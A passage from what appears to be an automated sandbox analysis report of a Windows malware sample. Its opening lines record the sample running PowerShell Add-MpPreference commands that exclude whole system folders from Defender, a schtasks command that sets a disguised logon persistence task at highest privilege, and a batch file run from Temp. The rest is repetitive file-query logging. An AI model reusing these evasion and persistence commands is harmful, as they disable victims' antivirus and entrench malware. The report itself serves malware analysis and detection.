                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /fJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'Jump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: 0_2_001FF654 cpuid 0_2_001FF654
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_001FAF0F
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeQueries volume information: C:\fontdriversavescrt\ComComponentDriverInto.exe VolumeInformationJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe VolumeInformationJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeQueries volume information: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
